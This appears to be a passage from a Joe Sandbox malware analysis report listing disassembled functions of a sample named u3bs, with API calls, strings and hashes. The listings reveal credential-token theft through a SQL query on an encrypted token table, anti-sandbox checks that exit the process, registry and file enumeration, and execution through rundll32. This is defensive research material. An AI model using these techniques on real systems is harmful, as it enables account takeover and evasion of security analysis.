Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: bdd97628f29c753fecfde2c83a5401364cfafbcd459e9bc7d3d7e6f311fbbc6e
Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: bdd97628f29c753fecfde2c83a5401364cfafbcd459e9bc7d3d7e6f311fbbc6e
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

AccountTokens, xrefs: 0040B28A
AccountTokens, xrefs: 0040B319
AccountId, xrefs: 0040B472
SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: d6f8aa2c73c68f92a0e58bbbfc20920170efd5a28ce5b04736f5b5a1e9792500
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: d6f8aa2c73c68f92a0e58bbbfc20920170efd5a28ce5b04736f5b5a1e9792500
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043129A0), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04312928), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043128E0), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043128F8), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04312910), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,0432E3B8), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04314538), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04314478), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04330228), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04330300), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043301E0), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04330180), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043143D8), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043303C0), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

GetUserDefaultLangID.KERNEL32 ref: 004136E6

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,043306D0,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0432E458,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,0432E458,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1125299040-0
Opcode ID: 347c744c57bb489da1d20327baf5dbd504a16fe07c4081f8531455d2c5727875
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: 347c744c57bb489da1d20327baf5dbd504a16fe07c4081f8531455d2c5727875
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,04336648,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,043367C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 8ab0f01d07d0afedc2f6091183216f607dc1c33232ff2026bfdf8348589bd1d2
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 8ab0f01d07d0afedc2f6091183216f607dc1c33232ff2026bfdf8348589bd1d2
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,04336F50,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,043388A8,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,04338710), ref: 00411E2B

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,043378D8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: a8e0db1d6ef1a99a5c6703875a911b59b2c791a67ea3088ef4958de5150a2a16
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: a8e0db1d6ef1a99a5c6703875a911b59b2c791a67ea3088ef4958de5150a2a16
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,043378D8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

C:\Windows\system32\rundll32.dll, xrefs: 004110BF
"" , xrefs: 004111DC
<, xrefs: 004112AC
.dll, xrefs: 00411054

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: 8bf581271a99245cbe763f15856ee47378d6d56aa465237988ebd28fe15ceb26
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: 8bf581271a99245cbe763f15856ee47378d6d56aa465237988ebd28fe15ceb26
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,04336990), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,0432F450), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,043371D0), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 9316919b2ae84fd87c37e37ff305c137bc980bc565c5ec5aca0636d12a2c7ed7
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
Opcode Fuzzy Hash: 9316919b2ae84fd87c37e37ff305c137bc980bc565c5ec5aca0636d12a2c7ed7
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 6B08C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6B08C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6B08C969
GetSystemInfo.KERNEL32(?), ref: 6B08C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6B08C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6B08C9E2

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: f88ebaa9eac15cae56a336c73c0af45f62c4c64df784737af65840cd311f42c6
Instruction ID: 7010d7398c0ed0670f0fff0eb0ba60d4f784ef5b198d08aae1c228c2971f7ae3
Opcode Fuzzy Hash: f88ebaa9eac15cae56a336c73c0af45f62c4c64df784737af65840cd311f42c6
Instruction Fuzzy Hash: 6B210A327512146BDF288E64EC88BAE7FBEAB46700F500159FD46A7680DF3499008BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,04330800), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: a9c67daaacc7e92ff4ee03e3180183e77f5cf7bec37821e85d74a49978411dd6
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: a9c67daaacc7e92ff4ee03e3180183e77f5cf7bec37821e85d74a49978411dd6
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,04332990,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,04337410,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
